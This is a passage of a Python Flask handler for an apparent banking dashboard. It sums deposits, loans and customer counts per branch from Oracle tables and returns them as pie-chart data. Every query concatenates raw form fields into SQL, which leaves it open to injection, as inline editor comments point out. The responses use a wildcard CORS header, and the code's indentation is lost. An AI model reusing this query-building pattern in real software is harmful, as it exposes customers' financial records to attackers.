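# connection nor the cursor is ever closed; a context manager or try/finally
# around the handler body would be the safer pattern.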
lowerBound = request.form['lowerBound']
upperBound = request.form['upperBound']
timegrain = request.form['timegrain']
sumtype = request.form['sumtype']
datatype = request.form['datatype']
graphtype = request.form['graphtype']
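# Editor's sketch: the SQL below is assembled by concatenating these raw form
# fields, which is open to SQL injection. With cx_Oracle the same date filter
# could use bind variables instead (hypothetical, not wired into this handler):
#     cursor.execute(
#         "SELECT ... FROM CHECK_ACCOUNT WHERE CHECK_ACCOUNT_REGDATE > TO_DATE(:lb,'YYYY-MM-DD')",
#         lb=lowerBound)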
#=======================================================================================================
#============= per-branch statistics ============= pie chart =============
#==============================================================================
if graphtype == 'pie':
#========================== total transaction amount =======================================
if datatype == 'money':
if sumtype == 'saving':
# #================================== savings business =======================================
#   branch1   branch2   branch3
#   ¥233      ¥345      ¥678   (savings)
#
#---------check account-----------
sqlcommand_check = ""
sqlcommand_check_term = "1=1"  # '1=1' keeps the WHERE clause valid when either bound is empty
if (len(lowerBound) > 0) :
sqlcommand_check_term = sqlcommand_check_term + " AND CHECK_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_check_term = sqlcommand_check_term + " AND CHECK_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_check = sqlcommand_check + '''
SELECT
B_name AS B_name1,
SUM(C_A_money1) AS SUM_C_A_money
FROM(
SELECT CUSTOMER_CHECK_ACCOUNT.BANK_NAME AS B_name,
NEW_CHECK_ACCOUNT.C_A_ID AS C_A_ID1,
NEW_CHECK_ACCOUNT.C_A_money AS C_A_money1
FROM(
SELECT
CHECK_ACCOUNT_ID AS C_A_ID,
CHECK_ACCOUNT_MONEY AS C_A_money
FROM CHECK_ACCOUNT
WHERE ''' + sqlcommand_check_term + '''
)NEW_CHECK_ACCOUNT,
CUSTOMER_CHECK_ACCOUNT
WHERE NEW_CHECK_ACCOUNT.C_A_ID = CUSTOMER_CHECK_ACCOUNT.CHECK_ACCOUNT_ID
)
GROUP BY B_name
'''
print(sqlcommand_check)
cursor.execute(sqlcommand_check)
cursor.rowfactory = makeDictFactory(cursor)
result_check = cursor.fetchall()
print(result_check)
#----------deposit account--------
sqlcommand_deposit = ""
sqlcommand_deposit_term = "1=1"  # '1=1' keeps the WHERE clause valid when either bound is empty
if (len(lowerBound) > 0) :
sqlcommand_deposit_term = sqlcommand_deposit_term + " AND DEPOSIT_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_deposit_term = sqlcommand_deposit_term + " AND DEPOSIT_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_deposit = sqlcommand_deposit + '''
SELECT
B_name AS B_name2,
SUM(D_A_money1) AS SUM_D_A_money
FROM(
SELECT CUSTOMER_DEPOSIT_ACCOUNT.BANK_NAME AS B_name,
NEW_DEPOSIT_ACCOUNT.D_A_ID AS D_A_ID1,
NEW_DEPOSIT_ACCOUNT.D_A_money AS D_A_money1
FROM(
SELECT
DEPOSIT_ACCOUNT_ID AS D_A_ID,
DEPOSIT_ACCOUNT_MONEY AS D_A_money
FROM DEPOSIT_ACCOUNT
WHERE '''+ sqlcommand_deposit_term +'''
)NEW_DEPOSIT_ACCOUNT,
CUSTOMER_DEPOSIT_ACCOUNT
WHERE NEW_DEPOSIT_ACCOUNT.D_A_ID = CUSTOMER_DEPOSIT_ACCOUNT.DEPOSIT_ACCOUNT_ID
)
GROUP BY B_name
'''
print(sqlcommand_deposit)
cursor.execute(sqlcommand_deposit)
cursor.rowfactory = makeDictFactory(cursor)
result_deposit = cursor.fetchall()
print(result_deposit)
#----------- merge the deposit-account and check-account query results ------------
columnlist_pie_money_saving = []
rawData_pie_money_saving = {}
for i in range(len(result_check)):
columnlist_pie_money_saving.append(result_check[i]['b_name1'])
for i in range(len(result_deposit)):
if result_deposit[i]['b_name2'] not in columnlist_pie_money_saving:
columnlist_pie_money_saving.append(result_deposit[i]['b_name2'])
print('columnlist_pie_money_saving is:')
print(columnlist_pie_money_saving)
for i in range(len(result_check)):
if result_check[i]['b_name1'] not in rawData_pie_money_saving:
rawData_pie_money_saving[result_check[i]['b_name1']] = result_check[i]['sum_c_a_money']
else:
rawData_pie_money_saving[result_check[i]['b_name1']] += result_check[i]['sum_c_a_money']
for i in range(len(result_deposit)):
if result_deposit[i]['b_name2'] not in rawData_pie_money_saving:
rawData_pie_money_saving[result_deposit[i]['b_name2']] = result_deposit[i]['sum_d_a_money']
else:
rawData_pie_money_saving[result_deposit[i]['b_name2']] += result_deposit[i]['sum_d_a_money']
print('rawData_pie_money_saving is:')
print(rawData_pie_money_saving)
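# Editor's note: at this point the pie-chart payload has the shape
#     columnlist_pie_money_saving -> ['branch_A', 'branch_B']
#     rawData_pie_money_saving    -> {'branch_A': 1200.0, 'branch_B': 800.0}
# (branch names and amounts are illustrative only).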
#-------------- pie chart (commented-out matplotlib rendering) ----------------
# plt.rcParams['font.sans-serif']=['SimHei']
# keys = []
# values = []
# for i in range(len(columnlist_pie_money_saving)):
# values.append(rawData_pie_money_saving[columnlist_pie_money_saving[i]])
# for i in range(len(columnlist_pie_money_saving)):
# keys.append(columnlist_pie_money_saving[i].strip())
# print('ooooooooooooooooo---pie---oooooooooooo:')
# print(columnlist_pie_money_saving)
# s = pd.Series(values, index=keys)
# labels = s.index
# sizes = s.values
# #fig1, ax1 = plt.subplots( figsize=(6,6)) # set the drawing area size
# fig1, ax1 = plt.subplots()
# ax1.pie(sizes, labels=labels, autopct='%1.0f%%',
# shadow=True, startangle=190)
# ax1.axis('equal')
# if os.path.exists(r'../static/summary.png'):
# os.remove(r'../static/summary.png')
# print('finish remove')
# plt.savefig(r'../static/summary.png')
# #plt.show()
#------- pie chart end -------------
if result_check or result_deposit :
response = make_response(
jsonify(
{
'code': 200,
'columnList':columnlist_pie_money_saving,
'rawData':[
rawData_pie_money_saving
]
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
response = make_response(
jsonify(
{
'code': 400
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
elif sumtype == 'loan':
#============================= loan business ==========================
#
#   branch1   branch2   branch3
#   ¥233      ¥345      ¥678   (loan)
#
sqlcommand_loan = ""
sqlcommand_loan_term = "1=1"  # '1=1' keeps the WHERE clause valid when either bound is empty
if (len(lowerBound) > 0) :
sqlcommand_loan_term = sqlcommand_loan_term + " AND PAY_DATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_loan_term = sqlcommand_loan_term + " AND PAY_DATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_loan = sqlcommand_loan + '''
SELECT
bank_name1 AS bank_name2,
SUM(pay_money1) AS sum_pay_money2
FROM(
SELECT NEW_PAY.loan_id0 AS loan_id1,
NEW_PAY.pay_date0 AS pay_date1,
NEW_PAY.pay_money0 AS pay_money1,
LOAN.BANK_NAME AS bank_name1
FROM(
SELECT
LOAN_ID AS loan_id0,
PAY_DATE AS pay_date0,
PAY_MONEY AS pay_money0
FROM PAY
WHERE ''' + sqlcommand_loan_term + '''
)NEW_PAY, LOAN
WHERE NEW_PAY.loan_id0 = LOAN.LOAN_ID
)
GROUP BY bank_name1
'''
print(sqlcommand_loan)
cursor.execute(sqlcommand_loan)
cursor.rowfactory = makeDictFactory(cursor)
result_loan = cursor.fetchall()
print(result_loan)
#-------- result processing ---------
columnlist_pie_money_loan = []
rawData_pie_money_loan = {}
for i in range(len(result_loan)):
columnlist_pie_money_loan.append(result_loan[i]['bank_name2'])
print('columnlist_pie_money_loan is:')
print(columnlist_pie_money_loan)
for i in range(len(result_loan)):
rawData_pie_money_loan[result_loan[i]['bank_name2']] = result_loan[i]['sum_pay_money2']
print('rawData_pie_money_loan is:')
print(rawData_pie_money_loan)
#------------- pie chart (commented-out matplotlib rendering) -------------------
# plt.rcParams['font.sans-serif']=['SimHei']
# values = []
# keys = []
# for i in range(len(columnlist_pie_money_loan)):
# values.append(rawData_pie_money_loan[columnlist_pie_money_loan[i]])
# for i in range(len(columnlist_pie_money_loan)):
# keys.append( columnlist_pie_money_loan[i].strip() )
# print('ooooooooooooooooo---pie---oooooooooooo:')
# print(columnlist_pie_money_loan)
# s = pd.Series(values, index=keys)
# labels = s.index
# sizes = s.values
# #fig1, ax1 = plt.subplots( figsize=(6,6)) # set the drawing area size
# fig1, ax1 = plt.subplots()
# ax1.pie(sizes, labels=labels, autopct='%1.0f%%',
# shadow=True, startangle=190)
# ax1.axis('equal')
# if os.path.exists(r'../static/summary.png'):
# os.remove(r'../static/summary.png')
# print('finish remove')
# plt.savefig(r'../static/summary.png')
#plt.show()
#------------end---------------------
if result_loan :
response = make_response(
jsonify(
{
'code': 200,
'columnList':columnlist_pie_money_loan,
'rawData':[
rawData_pie_money_loan
]
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
response = make_response(
jsonify(
{
'code': 400
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
elif sumtype == 'all':  # all business types
#
#   branch1   branch2   branch3
#   ¥233      ¥345      ¥678   (all)
#
#------no.1---loan--------
sqlcommand_loan = ""
sqlcommand_loan_term = "1=1"  # '1=1' keeps the WHERE clause valid when either bound is empty
if (len(lowerBound) > 0) :
sqlcommand_loan_term = sqlcommand_loan_term + " AND PAY_DATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_loan_term = sqlcommand_loan_term + " AND PAY_DATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_loan = sqlcommand_loan + '''
SELECT
bank_name1 AS bank_name2,
SUM(pay_money1) AS sum_pay_money2
FROM(
SELECT NEW_PAY.loan_id0 AS loan_id1,
NEW_PAY.pay_date0 AS pay_date1,
NEW_PAY.pay_money0 AS pay_money1,
LOAN.BANK_NAME AS bank_name1
FROM(
SELECT
LOAN_ID AS loan_id0,
PAY_DATE AS pay_date0,
PAY_MONEY AS pay_money0
FROM PAY
WHERE ''' + sqlcommand_loan_term + '''
)NEW_PAY, LOAN
WHERE NEW_PAY.loan_id0 = LOAN.LOAN_ID
)
GROUP BY bank_name1
'''
print(sqlcommand_loan)
cursor.execute(sqlcommand_loan)
cursor.rowfactory = makeDictFactory(cursor)
result_loan = cursor.fetchall()
print(result_loan)
#------no.2---check--------
sqlcommand_check = ""
sqlcommand_check_term = "1=1"  # '1=1' keeps the WHERE clause valid when either bound is empty
if (len(lowerBound) > 0) :
sqlcommand_check_term = sqlcommand_check_term + " AND CHECK_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_check_term = sqlcommand_check_term + " AND CHECK_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_check = sqlcommand_check + '''
SELECT
B_name AS B_name1,
SUM(C_A_money1) AS SUM_C_A_money
FROM(
SELECT CUSTOMER_CHECK_ACCOUNT.BANK_NAME AS B_name,
NEW_CHECK_ACCOUNT.C_A_ID AS C_A_ID1,
NEW_CHECK_ACCOUNT.C_A_money AS C_A_money1
FROM(
SELECT
CHECK_ACCOUNT_ID AS C_A_ID,
CHECK_ACCOUNT_MONEY AS C_A_money
FROM CHECK_ACCOUNT
WHERE ''' + sqlcommand_check_term + '''
)NEW_CHECK_ACCOUNT,
CUSTOMER_CHECK_ACCOUNT
WHERE NEW_CHECK_ACCOUNT.C_A_ID = CUSTOMER_CHECK_ACCOUNT.CHECK_ACCOUNT_ID
)
GROUP BY B_name
'''
print(sqlcommand_check)
cursor.execute(sqlcommand_check)
cursor.rowfactory = makeDictFactory(cursor)
result_check = cursor.fetchall()
print(result_check)
#------no.3---deposit--------
sqlcommand_deposit = ""
sqlcommand_deposit_term = "1=1"  # '1=1' keeps the WHERE clause valid when either bound is empty
if (len(lowerBound) > 0) :
sqlcommand_deposit_term = sqlcommand_deposit_term + " AND DEPOSIT_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_deposit_term = sqlcommand_deposit_term + " AND DEPOSIT_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_deposit = sqlcommand_deposit + '''
SELECT
B_name AS B_name2,
SUM(D_A_money1) AS SUM_D_A_money
FROM(
SELECT CUSTOMER_DEPOSIT_ACCOUNT.BANK_NAME AS B_name,
NEW_DEPOSIT_ACCOUNT.D_A_ID AS D_A_ID1,
NEW_DEPOSIT_ACCOUNT.D_A_money AS D_A_money1
FROM(
SELECT
DEPOSIT_ACCOUNT_ID AS D_A_ID,
DEPOSIT_ACCOUNT_MONEY AS D_A_money
FROM DEPOSIT_ACCOUNT
WHERE '''+ sqlcommand_deposit_term +'''
)NEW_DEPOSIT_ACCOUNT,
CUSTOMER_DEPOSIT_ACCOUNT
WHERE NEW_DEPOSIT_ACCOUNT.D_A_ID = CUSTOMER_DEPOSIT_ACCOUNT.DEPOSIT_ACCOUNT_ID
)
GROUP BY B_name
'''
print(sqlcommand_deposit)
cursor.execute(sqlcommand_deposit)
cursor.rowfactory = makeDictFactory(cursor)
result_deposit = cursor.fetchall()
print(result_deposit)
#-------- result processing ---------
columnlist_pie_money_all = []
rawData_pie_money_all = {}
for i in range(len(result_loan)):
columnlist_pie_money_all.append(result_loan[i]['bank_name2'])
for i in range(len(result_check)):
if result_check[i]['b_name1'] not in columnlist_pie_money_all:
columnlist_pie_money_all.append(result_check[i]['b_name1'])
for i in range(len(result_deposit)):
if result_deposit[i]['b_name2'] not in columnlist_pie_money_all:
columnlist_pie_money_all.append(result_deposit[i]['b_name2'])
print('columnlist_pie_money_all is:')
print(columnlist_pie_money_all)
for i in range(len(result_loan)):
if result_loan[i]['bank_name2'] not in rawData_pie_money_all:
rawData_pie_money_all[result_loan[i]['bank_name2']] = result_loan[i]['sum_pay_money2']
else:
rawData_pie_money_all[result_loan[i]['bank_name2']] += result_loan[i]['sum_pay_money2']
for i in range(len(result_check)):
if result_check[i]['b_name1'] not in rawData_pie_money_all:
rawData_pie_money_all[result_check[i]['b_name1']] = result_check[i]['sum_c_a_money']
else:
rawData_pie_money_all[result_check[i]['b_name1']] += result_check[i]['sum_c_a_money']
for i in range(len(result_deposit)):
if result_deposit[i]['b_name2'] not in rawData_pie_money_all:
rawData_pie_money_all[result_deposit[i]['b_name2']] = result_deposit[i]['sum_d_a_money']
else:
rawData_pie_money_all[result_deposit[i]['b_name2']] += result_deposit[i]['sum_d_a_money']
print('rawData_pie_money_all is:')
print(rawData_pie_money_all)
#------------- pie chart (commented-out matplotlib rendering) -------------------
# plt.rcParams['font.sans-serif']=['SimHei']
# values = []
# keys = []
# for i in range(len(columnlist_pie_money_all)):
# values.append(rawData_pie_money_all[columnlist_pie_money_all[i]])
# for i in range(len(columnlist_pie_money_all)):
# keys.append(columnlist_pie_money_all[i].strip())
# s = pd.Series(values, index=keys)
# labels = s.index
# sizes = s.values
# #fig1, ax1 = plt.subplots( figsize=(6,6)) # set the drawing area size
# fig1, ax1 = plt.subplots()
# ax1.pie(sizes, labels=labels, autopct='%1.0f%%',
# shadow=True, startangle=190)
# ax1.axis('equal')
# if os.path.exists(r'../static/summary.png'):
# os.remove(r'../static/summary.png')
# print('finish remove')
# plt.savefig(r'../static/summary.png')
# #plt.show()
#------------end---------------------
if result_loan or result_check or result_deposit :
response = make_response(
jsonify(
{
'code': 200,
'columnList':columnlist_pie_money_all,
'rawData':[
rawData_pie_money_all
]
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
response = make_response(
jsonify(
{
'code': 400
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
elif datatype == 'user':
#======================================= user counts =======================================
#
#   branch1   branch2   branch3
#   5 users   10 users  8 users   (savings)
#
#========================== user counts ============= savings business ==========================
if sumtype == 'saving':
#-------check-----account-----
sqlcommand_check = ""
sqlcommand_check_term = "1=1"  # '1=1' keeps the WHERE clause valid when either bound is empty
if (len(lowerBound) > 0) :
sqlcommand_check_term = sqlcommand_check_term + " AND CHECK_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_check_term = sqlcommand_check_term + " AND CHECK_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_check = sqlcommand_check + '''
SELECT
B_name AS B_name1,
COUNT( distinct customer_id) AS count_customer1
FROM(
SELECT CUSTOMER_CHECK_ACCOUNT.BANK_NAME AS B_name,
CUSTOMER_CHECK_ACCOUNT.CUSTOMER_ID AS customer_id,
NEW_CHECK_ACCOUNT.C_A_ID AS C_A_ID1
FROM(
SELECT
CHECK_ACCOUNT_ID AS C_A_ID
FROM CHECK_ACCOUNT
WHERE ''' + sqlcommand_check_term + '''
)NEW_CHECK_ACCOUNT, CUSTOMER_CHECK_ACCOUNT
WHERE NEW_CHECK_ACCOUNT.C_A_ID = CUSTOMER_CHECK_ACCOUNT.CHECK_ACCOUNT_ID
)
GROUP BY B_name
'''
print(sqlcommand_check)
cursor.execute(sqlcommand_check)
cursor.rowfactory = makeDictFactory(cursor)
result_check = cursor.fetchall()
print(result_check)
#----------deposit account--------
sqlcommand_deposit = ""
sqlcommand_deposit_term = "1=1"  # '1=1' keeps the WHERE clause valid when either bound is empty
if (len(lowerBound) > 0) :
sqlcommand_deposit_term = sqlcommand_deposit_term + " AND DEPOSIT_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_deposit_term = sqlcommand_deposit_term + " AND DEPOSIT_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_deposit = sqlcommand_deposit + '''
SELECT
B_name AS B_name2,
COUNT( distinct customer_id) AS count_customer2
FROM(
SELECT CUSTOMER_DEPOSIT_ACCOUNT.BANK_NAME AS B_name,
CUSTOMER_DEPOSIT_ACCOUNT.CUSTOMER_ID AS customer_id,
NEW_DEPOSIT_ACCOUNT.D_A_ID AS D_A_ID1
FROM(
SELECT
DEPOSIT_ACCOUNT_ID AS D_A_ID
FROM DEPOSIT_ACCOUNT
WHERE '''+ sqlcommand_deposit_term +'''
)NEW_DEPOSIT_ACCOUNT,CUSTOMER_DEPOSIT_ACCOUNT
WHERE NEW_DEPOSIT_ACCOUNT.D_A_ID = CUSTOMER_DEPOSIT_ACCOUNT.DEPOSIT_ACCOUNT_ID
)
GROUP BY B_name
'''
print(sqlcommand_deposit)
cursor.execute(sqlcommand_deposit)
cursor.rowfactory = makeDictFactory(cursor)
result_deposit = cursor.fetchall()
print(result_deposit)
#============= user counts ============= savings business ----- result processing -----------
columnlist_pie_user_saving = []
rawData_pie_user_saving = {}
for i in range(len(result_check)):
columnlist_pie_user_saving.append(result_check[i]['b_name1'])
for i in range(len(result_deposit)):
if result_deposit[i]['b_name2'] not in columnlist_pie_user_saving:
columnlist_pie_user_saving.append(result_deposit[i]['b_name2'])
print('columnlist_pie_user_saving is:')
print(columnlist_pie_user_saving)
for i in range(len(result_check)):
if result_check[i]['b_name1'] not in rawData_pie_user_saving:
rawData_pie_user_saving[result_check[i]['b_name1']] = result_check[i]['count_customer1']
else:
rawData_pie_user_saving[result_check[i]['b_name1']] += result_check[i]['count_customer1']
for i in range(len(result_deposit)):
if result_deposit[i]['b_name2'] not in rawData_pie_user_saving:
rawData_pie_user_saving[result_deposit[i]['b_name2']] = result_deposit[i]['count_customer2']
else:
rawData_pie_user_saving[result_deposit[i]['b_name2']] += result_deposit[i]['count_customer2']
print('rawData_pie_user_saving is:')
print(rawData_pie_user_saving)
if result_check or result_deposit :
response = make_response(
jsonify(
{
'code': 200,
'columnList':columnlist_pie_user_saving,
'rawData':[
rawData_pie_user_saving
]
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
response = make_response(
jsonify(
{
'code': 400
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
#---------
#
#   branch1   branch2   branch3
#   5 users   10 users  8 users   (loan business)
#
#============= user counts ============= loan business =============
elif sumtype == 'loan':
sqlcommand_loan = ""
sqlcommand_loan_term = "1=1"  # '1=1' keeps the WHERE clause valid when either bound is empty
if (len(lowerBound) > 0) :
sqlcommand_loan_term = sqlcommand_loan_term + " AND PAY_DATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_loan_term = sqlcommand_loan_term + " AND PAY_DATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_loan = sqlcommand_loan + '''
SELECT
bank_name1 AS bank_name3,
COUNT( distinct customer_id) AS count_customer3
FROM(
SELECT NEW_PAY.loan_id0 AS loan_id1,
LOAN_CUSTOMER.CUSTOMER_ID AS customer_id,
LOAN.BANK_NAME AS bank_name1
FROM(
SELECT
LOAN_ID AS loan_id0
FROM PAY
WHERE ''' + sqlcommand_loan_term + '''
)NEW_PAY, LOAN, LOAN_CUSTOMER
WHERE NEW_PAY.loan_id0 = LOAN.LOAN_ID and NEW_PAY.loan_id0 = LOAN_CUSTOMER.LOAN_ID
)
GROUP BY bank_name1
'''
print(sqlcommand_loan)
cursor.execute(sqlcommand_loan)
cursor.rowfactory = makeDictFactory(cursor)
result_loan = cursor.fetchall()
print(result_loan)
#------- user counts ---- loan business ---- result processing ---------
columnlist_pie_user_loan = []
rawData_pie_user_loan = {}
for i in range(len(result_loan)):
columnlist_pie_user_loan.append(result_loan[i]['bank_name3'])
print('columnlist_pie_user_loan is:')
print(columnlist_pie_user_loan)
for i in range(len(result_loan)):
rawData_pie_user_loan[result_loan[i]['bank_name3']] = result_loan[i]['count_customer3']
print('rawData_pie_user_loan is:')
print(rawData_pie_user_loan)
if result_loan :
response = make_response(
jsonify(
{
'code': 200,
'columnList':columnlist_pie_user_loan,
'rawData':[
rawData_pie_user_loan
]
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
response = make_response(
jsonify(
{
'code': 400
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
#
#   branch1   branch2   branch3
#   5 users   10 users  8 users   (all business)
elif sumtype == 'all':
#------- user counts ---- all business ---------
#------------no.1-------check--------
sqlcommand_check = ""
sqlcommand_check_term = "1=1"  # '1=1' keeps the WHERE clause valid when either bound is empty
if (len(lowerBound) > 0) :
sqlcommand_check_term = sqlcommand_check_term + " AND CHECK_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_check_term = sqlcommand_check_term + " AND CHECK_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_check = sqlcommand_check + '''
SELECT
B_name AS B_name1,
COUNT( distinct customer_id) AS count_customer1
FROM(
SELECT CUSTOMER_CHECK_ACCOUNT.BANK_NAME AS B_name,
CUSTOMER_CHECK_ACCOUNT.CUSTOMER_ID AS customer_id,
NEW_CHECK_ACCOUNT.C_A_ID AS C_A_ID1
FROM(
SELECT
CHECK_ACCOUNT_ID AS C_A_ID
FROM CHECK_ACCOUNT
WHERE ''' + sqlcommand_check_term + '''
)NEW_CHECK_ACCOUNT, CUSTOMER_CHECK_ACCOUNT
WHERE NEW_CHECK_ACCOUNT.C_A_ID = CUSTOMER_CHECK_ACCOUNT.CHECK_ACCOUNT_ID
)
GROUP BY B_name
'''
print(sqlcommand_check)
cursor.execute(sqlcommand_check)
cursor.rowfactory = makeDictFactory(cursor)
result_check = cursor.fetchall()
print(result_check)
#-----------no.2--------deposit-----------
sqlcommand_deposit = ""
sqlcommand_deposit_term = "1=1"  # '1=1' keeps the WHERE clause valid when either bound is empty
if (len(lowerBound) > 0) :
sqlcommand_deposit_term = sqlcommand_deposit_term + " AND DEPOSIT_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_deposit_term = sqlcommand_deposit_term + " AND DEPOSIT_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_deposit = sqlcommand_deposit + '''
SELECT
B_name AS B_name2,
COUNT( distinct customer_id) AS count_customer2
FROM(
SELECT CUSTOMER_DEPOSIT_ACCOUNT.BANK_NAME AS B_name,
CUSTOMER_DEPOSIT_ACCOUNT.CUSTOMER_ID AS customer_id,
NEW_DEPOSIT_ACCOUNT.D_A_ID AS D_A_ID1
FROM(
SELECT
DEPOSIT_ACCOUNT_ID AS D_A_ID
FROM DEPOSIT_ACCOUNT
WHERE '''+ sqlcommand_deposit_term +'''
)NEW_DEPOSIT_ACCOUNT,CUSTOMER_DEPOSIT_ACCOUNT
WHERE NEW_DEPOSIT_ACCOUNT.D_A_ID = CUSTOMER_DEPOSIT_ACCOUNT.DEPOSIT_ACCOUNT_ID
)
GROUP BY B_name
'''
print(sqlcommand_deposit)
cursor.execute(sqlcommand_deposit)
cursor.rowfactory = makeDictFactory(cursor)
result_deposit = cursor.fetchall()
print(result_deposit)
#-----------no.3---------loan------
sqlcommand_loan = ""
sqlcommand_loan_term = "1=1"  # '1=1' keeps the WHERE clause valid when either bound is empty
if (len(lowerBound) > 0) :
sqlcommand_loan_term = sqlcommand_loan_term + " AND PAY_DATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_loan_term = sqlcommand_loan_term + " AND PAY_DATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_loan = sqlcommand_loan + '''
SELECT
bank_name1 AS bank_name3,
COUNT( distinct customer_id) AS count_customer3
FROM(
SELECT NEW_PAY.loan_id0 AS loan_id1,
LOAN_CUSTOMER.CUSTOMER_ID AS customer_id,
LOAN.BANK_NAME AS bank_name1
FROM(
SELECT
LOAN_ID AS loan_id0
FROM PAY
WHERE ''' + sqlcommand_loan_term + '''
)NEW_PAY, LOAN, LOAN_CUSTOMER
WHERE NEW_PAY.loan_id0 = LOAN.LOAN_ID and NEW_PAY.loan_id0 = LOAN_CUSTOMER.LOAN_ID
)
GROUP BY bank_name1
'''
print(sqlcommand_loan)
cursor.execute(sqlcommand_loan)
cursor.rowfactory = makeDictFactory(cursor)
result_loan = cursor.fetchall()
print(result_loan)
#------- user counts ---- all ---- result processing ---------
columnlist_pie_user_all = []
rawData_pie_user_all = {}
for i in range(len(result_loan)):
columnlist_pie_user_all.append(result_loan[i]['bank_name3'])
for i in range(len(result_check)):
if result_check[i]['b_name1'] not in columnlist_pie_user_all:
columnlist_pie_user_all.append(result_check[i]['b_name1'])
for i in range(len(result_deposit)):
if result_deposit[i]['b_name2'] not in columnlist_pie_user_all:
columnlist_pie_user_all.append(result_deposit[i]['b_name2'])
print('columnlist_pie_user_all is:')
print(columnlist_pie_user_all)
for i in range(len(result_check)):
if result_check[i]['b_name1'] not in rawData_pie_user_all:
rawData_pie_user_all[result_check[i]['b_name1']] = result_check[i]['count_customer1']
else:
rawData_pie_user_all[result_check[i]['b_name1']] += result_check[i]['count_customer1']
for i in range(len(result_deposit)):
if result_deposit[i]['b_name2'] not in rawData_pie_user_all:
rawData_pie_user_all[result_deposit[i]['b_name2']] = result_deposit[i]['count_customer2']
else:
rawData_pie_user_all[result_deposit[i]['b_name2']] += result_deposit[i]['count_customer2']
for i in range(len(result_loan)):
if result_loan[i]['bank_name3'] not in rawData_pie_user_all:
rawData_pie_user_all[result_loan[i]['bank_name3']] = result_loan[i]['count_customer3']
else:
rawData_pie_user_all[result_loan[i]['bank_name3']] += result_loan[i]['count_customer3']
print('rawData_pie_user_all is:')
print(rawData_pie_user_all)
#------------- pie chart (commented-out matplotlib rendering) -------------------
# plt.rcParams['font.sans-serif']=['SimHei']
# values = []
# keys = []
# for i in range(len(columnlist_pie_user_all)):
# values.append(rawData_pie_user_all[columnlist_pie_user_all[i]])
# for i in range(len(columnlist_pie_user_all)):
# keys.append(columnlist_pie_user_all[i].strip())
# s = pd.Series(values, index=keys)
# labels = s.index
# sizes = s.values
